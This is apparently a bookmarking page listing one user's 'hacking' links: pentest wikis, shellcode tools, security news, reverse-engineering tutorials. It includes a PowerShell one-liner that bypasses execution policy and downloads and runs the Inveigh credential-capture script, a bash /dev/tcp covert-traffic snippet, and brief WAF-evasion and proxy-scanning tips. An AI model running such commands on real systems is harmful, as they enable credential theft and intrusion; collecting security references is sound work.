whip_lash : hacking   92

GitHub - mubix/post-exploitation-wiki: Post Exploitation Wiki
Post Exploitation Wiki. Contribute to mubix/post-exploitation-wiki development by creating an account on GitHub.
hacking  pentesting  github  postexploitation 
7 weeks ago by whip_lash
GitHub - zardus/preeny: Some helpful preload libraries for pwning stuff.
Preeny helps you pwn noobs by making it easier to interact with services locally. It disables fork(), rand(), and alarm() and, if you want, can convert a server application to a console one using clever/hackish tricks, and can even patch binaries!
binary  hacking  library  preload  ld_preload 
8 weeks ago by whip_lash
GitHub - TheSecondSun/Shellab: Linux and Windows shellcode enrichment utility
Shellab is a tool that can be used to improve existing shellcodes and adapt them for personal needs. Developed to provide an alternative to msfvenom with new functionalities. Suitable for both Windows and Linux shellcode (32 and 64 bit).
hacking  tool  shellcode  exploit  development 
12 weeks ago by whip_lash
Provadys Offensive Security Blog
Last May, Casey Smith pointed out on twitter and on his blog that the .NET profiler DLL loading can be abused to make a legit .NET application load a malicious DLL using environment variables.

When reading this, first thing that came to mind was "if this works with elevated .NET processes, this would make a nice UAC bypass as well". And sure enough, it does.

This issue is still unfixed as of this writing – and may remain so – but is already public since July, as it was independently discovered, reported and published on Full Disclosure by Stefan Kanthak.
hacking  uac  windows  pentest 
december 2018 by whip_lash
GTFOBins
The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. See the full list of functions.

This was inspired by the LOLBins project for Windows.
linux  pentesting  hacking  security  shell  privesc  privilegeescalation  gtfobins 
july 2018 by whip_lash
RedTeam_CheatSheet.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
hacking  pentest  security 
july 2018 by whip_lash
Car Hacking: The definitive source
Instead of buying books or paying exorbitant amount of money to learn about car hacking, we (Charlie Miller and Chris Valasek) decided to publish all our tools, data, research notes, and papers to everyone for FREE! Feel free to reach out if you have any questions. If you're nice enough we may actually send you one of our IDBs ;)
car  hacking  security 
july 2018 by whip_lash
Malicious Network Traffic From /bin/bash - SANS Internet Storm Center
exec 5<> /dev/tcp/blog.rootshell.be/80
printf "GET / HTTP/1.0\nHost: blog.rootshell.be\n" >&5
cat <&5
exec 5>&-
bash  c2  networking  hacking  pentest  security  linux  postexploitation 
april 2018 by whip_lash
Introducing Metta: Uber’s Open Source Tool for Adversarial Simulation
Today, Uber announced the open-source release of Metta, a tool for basic adversarial simulation. Modern software techniques such as end-to-end functional testing and test-driven development work well for software design, and these same techniques can be applied to detection systems. In fact, Metta was born from multiple internal projects where we’d already brought DevOps concepts to our detection rules.
devops  hacking  opensource  security  purpleteam  metta 
march 2018 by whip_lash
Car Hacker's Handbook
Build an accurate threat model for your vehicle
Reverse engineer the CAN bus to fake engine signals
Exploit vulnerabilities in diagnostic and data-logging systems
Hack the ECU and other firmware and embedded systems
Feed exploits through infotainment and vehicle-to-vehicle communication systems
Override factory settings with performance-tuning techniques
Build physical and virtual test benches to try out exploits safely
books  car  cars  hacking  tools  security 
february 2018 by whip_lash
Practical Reverse Engineering Part 1 - Hunting for Debug Ports · Hack The World
In this series of posts we’re gonna go through the process of Reverse Engineering a router. More specifically, a Huawei HG533.
electronics  hacking  hardware  reverseengineering  security 
january 2018 by whip_lash
Introduction to reverse engineering and Assembly. | KaKaRoTo's Blog
I’ve always said that reverse engineering and ASM is “too complicated to explain” or that “If you need help to get started, then you won’t be able to finish it on your own” and various other vague responses—I often wanted to explain to others why I said things like that but I never found a way to do it. You see, when something is complex, it’s easy to say that it’s complex, but it’s much harder to explain to people why it’s complex.
assembly  hacking  programming  reverseengineering 
january 2018 by whip_lash
CTF Series : Vulnerable Machines — tech.bitvijays.com
This post (Work in Progress) records what we learned by doing vulnerable machines provided by VulnHub, Hack the Box and others. The steps below could be followed to find vulnerabilities, exploit these vulnerabilities and finally become system/root.
ctf  howto  hacking 
january 2018 by whip_lash
‘It Can’t Be True.’ Inside the Semiconductor Industry’s Meltdown - Bloomberg
Fogh and Gruss stayed up late at night discussing the theoretical basis for what would later become Spectre and Meltdown. But, like Prescher more than a year later, the Graz team was skeptical this was a real flaw. Gruss recalls telling Fogh that the chipmakers would have uncovered such a glaring security hole during testing and would never have shipped chips with a vulnerability like that.

YOU'D THINK
intel  hardware  bug  hacking 
january 2018 by whip_lash
Web Application Firewall (WAF) Evasion Techniques – secjuice™ – Medium
Why using ? instead of *? Because the asterisk (*) is widely used for comment syntax (something like /* hey I’m a comment */) and many WAF blocks it in order to avoid SQL Injection… something like UNION+SELECT+1,2,3/*
waf  hacking  pentest  security 
january 2018 by whip_lash
IoT Privacy and Security Challenges for Smart Home Environments
In the case of the quote above, hackers attempted to steal data from a North American casino through a fish tank that was connected to the internet. Although the casino had implemented some security precautions, these hackers still managed to compromise the tank to send data to a device in Finland before the threat was discovered and the perpetrators were stopped.

CONTINUOUS PERIMETER SCANNING. FIND THE FISH TANK BEFORE THE RUSSIANS DO.
iot  hacking  security 
january 2018 by whip_lash
Cracking Encrypted PDFs – Part 1 | Didier Stevens
In this series of blog posts, I’ll explain how I decrypted the encrypted PDFs shared by John August (John wanted to know how easy it is to crack encrypted PDFs, and started a challenge).

Here is how I decrypted the “easy” PDF (encryption_test).
pdf  hacking  pentest  security 
january 2018 by whip_lash
Code Used in Zero Day Huawei Router Attack Made Public | Threatpost | The first stop for security news
Exploit code used in the Mirai malware variant called Satori, which was used to attack hundreds of thousands of Huawei routers over the past several weeks, is now public.
hacking  iot  botnet 
december 2017 by whip_lash
Inside the Hunt for Russia's Most Notorious Hacker | WIRED
Amazingly, more than two years later, the success has largely stuck: The botnet has never reassembled, though about 5,000 computers worldwide remain infected with Zeus malware. The industry partners are still maintaining the server sinkhole that’s swallowing up the traffic from those infected computers.
hacking  russia  botnet  zeus 
december 2017 by whip_lash
Unsecured Amazon S3 Bucket Exposes Details on 123 Million American Households
While the data belonging to the US Census Bureau — the 2010 census results — were already publicly available on the Bureau's Census website, the Experian data was never meant to be exposed.

The Experian data was stored in a file named "ConsumerView_10_2013.yxdb" and contained what UpGuard researchers described as the "personally identifying details and data points about virtually every American household."
breach  hacking  s3 
december 2017 by whip_lash
Hacking the Hackers: Leveraging an SSRF in HackerTarget
I created another PHP file on my server that would redirect the API to the internal SMTP server and issue the valid SMTP commands!
ssrf  hacking  pentest 
december 2017 by whip_lash
Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure | FireEye Inc
Mandiant recently responded to an incident at a critical infrastructure organization where an attacker deployed malware designed to manipulate industrial safety systems. The targeted systems provided emergency shutdown capability for industrial processes. We assess with moderate confidence that the attacker was developing the capability to cause physical damage and inadvertently shutdown operations. This malware, which we call TRITON, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. We have not attributed the incident to a threat actor, though we believe the activity is consistent with a nation state preparing for an attack.
hacking  ics 
december 2017 by whip_lash
Hackers hit key ATM network in crime spree that clears $10 million | Ars Technica
Last year, online criminals used stolen SWIFT account credentials to steal $81 million from a bank in Bangladesh. Group-IB said the amount of information MoneyTaker has amassed on the Star, SWIFT, and AWS CBR networks raised the possibility the group may be planning more heists that target the interbank payment systems.
hacking  crime 
december 2017 by whip_lash
Researchers Find Trove of 1.4 Billion Breached Credentials - Infosecurity Magazine
This dump aggregates 252 previous breaches, including known credential lists such as Anti Public and Exploit.in, decrypted passwords of known breaches like LinkedIn as well as smaller breaches like Bitcoin and Pastebin sites

GET A COPY
passwords  hash  hacking 
december 2017 by whip_lash
Fox-IT reveals hackers hijacked its DNS records, spied on clients' files
Protect your website's DNS entries. Choose decent, unique passwords. Enable two-factor authentication on the account. And, if you have the clout, request that your DNS registrar confirm with a manual phone call if there is ever an attempt to point the records elsewhere.
dns  hacking  mitm 
december 2017 by whip_lash
Socks proxy servers scanning with nmap | Fun Over IP
A good way to collect your own proxy server list is to scan against (infected) ADSL/Cable users by choosing some ISP ranges from other countries.
proxy  socks  hacking  nmap 
september 2017 by whip_lash
Researcher Resources - Bounty Bug Write-ups - Security Research - Bugcrowd Forum
This is a collection of bug bounty reports that were submitted by security researchers in the infosec community. These write-ups are a great way to learn from fellow hackers.
bug  hacking  bugbounty  walkthrough  webapp  pentest  ctf 
august 2017 by whip_lash
Mind Maps
Information Security related Mind Maps
hacking  mindmap  security  pentest  ctf 
august 2017 by whip_lash
www.amanhardikar.com/mindmaps/Practice.html
PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS
hacking  pentest  security  testing  lab 
june 2017 by whip_lash
Tor/Usage/Nmap-scan-through-tor - aldeid
The scans only work through Tor exit nodes with
.... 443 9030 s Exit Fast Running V2Dir Valid ...

You can search for an appropriate Exit Node on http://128.31.0.34:9031/tor/status/all
nmap  proxy  security  hacking  pentest 
june 2015 by whip_lash